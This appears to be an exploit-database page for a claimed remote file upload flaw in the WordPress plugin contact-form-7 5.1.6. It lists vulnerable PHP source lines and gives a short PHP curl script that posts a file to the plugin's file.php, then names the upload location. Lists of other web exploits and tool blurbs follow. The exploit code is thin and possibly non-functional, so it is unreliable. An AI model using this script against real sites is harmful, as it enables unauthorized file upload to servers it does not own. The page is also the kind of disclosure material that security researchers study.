Search for hundreds of thousands of exploits

"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"

Author

Exploit author

"Mehran Feizi"

Platform

Exploit platform

php

Release date

Exploit published date

2020-02-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#  Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-11
#  vendor home page: https://wordpress.org/plugins/contact-form-7/

Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null; 
132: $new_file = path_join($uploads_dir, $filename); 
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
121: $uploads_dir = wpcf7_upload_tmp_dir(); 
131: $filename = wp_unique_filename($uploads_dir, $filename); 
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
121: $uploads_dir = wpcf7_upload_tmp_dir(); 
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 
126: $filename = wpcf7_antiscript_file_name ($filename); 
125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 
124: $filename = $file['name']; 
82: $file = $_FILES[$name] : null; 
82: $file = $_FILES[$name] : null; 
78: ⇓ function wpcf7_file_validation_filter($result, $tag)


Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg
Release DateTitleTypePlatformAuthor
2020-09-16"Piwigo 2.10.1 - Cross Site Scripting"webappsphpIridium
2020-09-15"Tailor MS 1.0 - Reflected Cross-Site Scripting"webappsphpboku
2020-09-15"ThinkAdmin 6 - Arbitrarily File Read"webappsphpHzllaga
2020-09-14"Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)"webappsphp"Mehmet Kelepçe"
2020-09-10"CuteNews 2.1.2 - Remote Code Execution"webappsphp"Musyoka Ian"
2020-09-09"Tailor Management System - 'id' SQL Injection"webappsphpMosaaed
2020-09-07"grocy 2.7.1 - Persistent Cross-Site Scripting"webappsphp"Mufaddal Masalawala"
2020-09-03"BloodX CMS 1.0 - Authentication Bypass"webappsphpBKpatron
2020-09-03"Daily Tracker System 1.0 - Authentication Bypass"webappsphp"Adeeb Shah"
2020-09-03"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)"webappsphpV1n1v131r4
Release DateTitleTypePlatformAuthor
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"webappsphp"Mehran Feizi"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-07"VehicleWorkshop 1.0 - 'bookingid' SQL Injection"webappsphp"Mehran Feizi"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48062/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.